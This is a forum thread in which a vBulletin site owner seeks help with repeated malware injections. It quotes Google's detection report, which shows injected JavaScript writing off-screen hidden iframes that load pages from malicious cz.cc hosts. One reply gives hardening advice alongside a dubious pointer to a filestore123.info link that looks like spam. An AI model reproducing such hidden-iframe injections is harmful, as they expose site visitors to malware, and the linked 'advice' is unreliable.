Anyone here experience with malware injection attacks?

Our site is now more than half a year plagued by malware injections, and I feel like I tried everything to get rid of them. It used to be a few attacks every week, but now users see Google warnings on several pages constantly.

Our site: ****

This is what Google WMT says:

/clientscript/vbulletin_global.js?v=386 - Details 04-05-11
/clientscript/vbulletin_post_loader.js?v=386 - Details 23-04-11

Suspected injected code Instances
document.write('<style>.irybbb3ngg { position:absolute; left
:-1286px; top:-1877px} </style> <div class="irybbb3ngg"><ifr
ame src="http://mesyldureefz.cz.cc/8afcmtjs/counter.php?id=2
"></iframe></div>');

Suspected injected code Instances
document.write('<style>.px7awd { position:absolute; left:-18
87px; top:-1869px} </style> <div class="px7awd"><iframe src=
"http://ticlili31.cz.cc/myi986px/counter.php?id=2"></iframe>
</div>');

I disabled all plugins including vbseo two days ago, but members reported new warnings today so my guess is it's either a leak in vbulletin or somehow our server got hacked.

The thing is that I already changed passwords for our server and scripts several times and all computers connecting to the server are also secure. Any help is very much appreciated.

Hello ,

You need to make sure your chmod 777 directories are protected and users are not uploading various gif images that include php scripts inside them. You can check Google redirecting to filestore123.info on how to protect your chmod 777 directories

Originally Posted by Mert Gökçeimam

Hello ,

You need to make sure your chmod 777 directories are protected and users are not uploading various gif images that include php scripts inside them. You can check Google redirecting to filestore123.info on how to protect your chmod 777 directories

Ok thank you Mert, I'll try that, sounds like something that could cause this. But isn't this a major security flaw in vbulletin then?

I've edited out your name.


The issue is not with vb, but with folder & file security.

Actually it is related with vBulletin also as vBulletin should make sure uploaded gif files doesn't have any malware inside. You can disable gif image upload also to get more security.

Thanks.

I have uploaded the htaccess protection and deleted some gifs.

Hopefully this will solve it, other suggestions are welcome.